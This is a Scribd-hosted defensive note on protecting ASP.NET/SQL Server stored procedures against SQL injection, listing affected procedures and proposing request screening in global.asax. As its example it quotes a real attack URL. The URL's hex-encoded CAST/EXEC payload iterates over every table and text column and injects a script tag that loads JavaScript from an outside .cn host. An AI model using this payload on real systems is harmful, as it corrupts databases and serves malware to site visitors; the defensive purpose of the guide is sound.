Scribd Logo
Upload

Welcome to Scribd!

  • Techniques For Protecting Against SQL Injection

    Uploaded by

    mkamran_ku
    11 views3 pages
    Sql injection occurs when attacker provides malicious data. Attacker can force statement truncation by passing unexpectedly long strings. A central location to register this code is in website's global.asax file.

    Original Description:

    Original Title

    Techniques for Protecting Against SQL Injection

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    DOC, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Sql injection occurs when attacker provides malicious data. Attacker can force statement truncation by passing unexpectedly long strings. A central location to register this code is in website's global.asax file.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    11 views3 pages

    Techniques For Protecting Against SQL Injection

    Uploaded by

    mkamran_ku
    Sql injection occurs when attacker provides malicious data. Attacker can force statement truncation by passing unexpectedly long strings. A central location to register this code is in website's global.asax file.

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    Techniques for protecting against Sql injection

       SQL injection occurs when the attacker provides malicious data that will change the
    semantics of the intended SQL you are generating, affecting the way it will be interpreted
    in the system.
    We are using Dynamic SQL in the following stored procedure.
    AutoData_GetEquipGroup
    CarComparison
    InsertGenerator
    SPASDealerContacts
    SPASModelMappings
    SPASRemotePhotos
    SPWSDealersByCSV
    SPWSGenericFillCombo
    SPWSGetCarDetailsFromIL
    SPWSGetDealersForFranchise
    SPWSMyShowRoomVehicles
    SPWSSearchCar
    SPWSSearchCarAdv
    SPWSSearchCarAdv2
    SPWSSearchCarByDealer
    SPWSSearchCarByPriceRange
    SPWSSEARCHCARCUSTOMLINK
    SPWSSearchCarDealer
    SPWSSearchCarRefine
    SPWSVehicleAdVehicles

    Method 1
    In each selected stored procedure, verify that all variables that are used in dynamic
    Transact-SQL are handled correctly. Data that comes from the input parameters of the
    stored procedure or that is read from a table should be wrapped in QUOTENAME() or
    REPLACE().
    Any dynamic Transact-SQL that is assigned to a variable will be truncated if it is larger
    than the buffer allocated for that variable. An attacker who is able to force statement
    truncation by passing unexpectedly long strings to a stored procedure can manipulate the
    result. For example, the stored procedure that is created by the following script is
    vulnerable to injection enabled by truncation.
    Method 2
    We need to screen all incoming query-string, form values by running code during the
    BeginRequest event.  A central location to register this code is in website’s global.asax
    file. 

    The code checks incoming data and automatically redirect to a page called "Error.aspx"
    if suspicious character sequences are found.
     URL : http://wncars.worldnow.com/web/webDealerInventory.aspx?
    DealerID=1174&SiteID=551;DECLARE @S CHAR(4000);SET
    @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
    283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207
    3656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C
    737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970
    653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220
    622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F
    437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E
    544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20
    657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223
    E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756
    E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B404
    32B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653
    E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F637
    37273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
    6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53452
    05461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
    CHAR(4000));EXEC(@S);
    URLScan flow Diagram

    Application Begin Request

    Get Incoming URL

    IsBadU Show error page


    RL ( )
    Yes

    No

    Show requested page

    You might also like